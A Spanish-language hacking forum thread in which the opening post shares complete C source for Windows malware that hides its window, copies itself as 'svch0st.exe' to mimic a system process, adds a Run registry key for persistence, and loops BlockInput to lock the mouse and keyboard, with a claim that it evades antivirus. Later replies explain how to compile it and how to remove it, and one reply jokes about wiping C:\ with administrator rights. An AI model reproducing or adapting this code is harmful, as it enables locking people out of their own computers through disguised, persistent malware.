Underc0de

Buenas Underc0de, sean bienvenidos a mi post, esta vez estare enseñando como crear un programa o virus, como ustedes lo quieran llamar, que bloquea el sistema, el raton y el teclado, solo tienen que añadirlo al inicio en el registro y todo esto sin ser detectado por ningun AntiVirus.

#include <windows.h>
#include <tlhelp32.h>
#include <winable.h>


#define BUFSIZE 80

int test_key(void);
int create_key(char *);



int main(void)
{
int test,create;
test=test_key();

if (test==2)
{
char *path="c:\\WINDOWS\\svch0st.exe";
create=create_key(path);

}

HWND inv;
AllocConsole();
inv=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(inv,0);
int c;

for(;;)
{
BlockInput(true);
}
char root[60]="C:\\Windows\\";
char nombre[60]="svch0st";
char path[256]="svch0st";
strcat(nombre,".exe");
strcat(root,nombre);
HMODULE copiar = GetModuleHandle(0);
GetModuleFileName(copiar, path, 256);
CopyFile(path,root,false);
}

int test_key(void)
{
int check;
HKEY hKey;
char path[BUFSIZE];
DWORD buf_length=BUFSIZE;
int reg_key;

reg_key=RegOpenKeyEx(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey);
if(reg_key!=0)
{
check=1;
return check;
}

reg_key=RegQueryValueEx(hKey,"Windows Files",NULL,NULL,(LPBYTE)path,&buf_length);

if((reg_key!=0)||(buf_length>BUFSIZE))
check=2;
if(reg_key==0)
check=0;

RegCloseKey(hKey);
return check;
}

int create_key(char *path)
{
int reg_key,check;

HKEY hkey;

reg_key=RegCreateKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",&hkey);
if(reg_key==0)
{
RegSetValueEx((HKEY)hkey,"Windows files",0,REG_SZ,(BYTE *)path,strlen(path));
check=0;
return check;
}
if(reg_key!=0)
check=1;

return check;

}


By Darax.

By Darax.

Esto que acabas de hacer es de muy mal gusto, jamas te robes los creditos de un codigo que no es tuyo y mucho menos si no sabes ni un poco de C

Cita de: [Corruptedyte link=topic=8180.msg29110#msg29110 date=1321932430]
By Darax.

Esto que acabas de hacer es de muy mal gusto, jamas te robes los creditos de un codigo que no es tuyo y mucho menos si no sabes ni un poco de C

Me disculpo men es que se me olvido salu2 !!

no hay un codigo mas smple?
lo digo porque uso linux y no uso ninguna libreria relacionada con windows... siquiera podrias mencionar su pseudocodigo?

Gracias por el aporte, a revisar que tal va.....

Saludos!!  :)

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
no hay un codigo mas smple?
lo digo porque uso linux y no uso ninguna libreria relacionada con windows... siquiera podrias mencionar su pseudocodigo?

lo que hace el programa es manipular el registro de windows, pero lo mas importante a resaltar es esto


for(;;)
{
BlockInput(true);
}


un ciclo infinito que prohibe la entrada de datos raton y teclado, que funcione o no, no estoy seguro, no me gustaria probarlo xd.

Amigo disculpa mi ignorancia, pues apenas voy comenzando el primer semestre de ingenieria de sistemas, como hacemos que ese virus funciones? es decir hay que guardarlo bajo una extension en especifico en el block de nota o que? orientame por favor... Ah y por cierto como casi todo mal tiene cura; hay una manera de revertir el efecto de este virus, es para bromear con mi esposa y jugarle un ratro pero sin hacerle daño a su informacion...

Si quieres jugar con tu esposa y hacerle pasar el rato, elimina todo el C:/ con permisos de administrador.

Ya enserio, si eres persona casada y quieres hacer este tipo de jueguitos, dejame decirte que pareces mas un niño inmaduro, revisa como compilar que es C? minimamente sabes que es ello, andas comenzando investiga ;).

Regards,
Snifer

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Amigo disculpa mi ignorancia, pues apenas voy comenzando el primer semestre de ingenieria de sistemas, como hacemos que ese virus funciones? es decir hay que guardarlo bajo una extension en especifico en el block de nota o que? orientame por favor... Ah y por cierto como casi todo mal tiene cura; hay una manera de revertir el efecto de este virus, es para bromear con mi esposa y jugarle un ratro pero sin hacerle daño a su informacion...

Simplemente copia el código en tu entorno y compilalo.

Investiga un poco, pues compilar en C es muy simple, te dejo algo que quizás te sirva de ayuda: https://underc0de.org/foro/c-c/compiladores-cc/

Un saludo.

 :) :'(  ;D Hola,  cómo se desactiva el virus, o no se puede?

Citar:) :'(  ;D Hola,  cómo se desactiva el virus, o no se puede?

Si te fijas en el code verás que se añade al registro de Windows

HKEY_LOCAL_MACHINE,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_QUERY_VALUE,&hKey

Solamente elimina la entrada del arranque y listo.

Saludos

gracias ese es un rasonmaware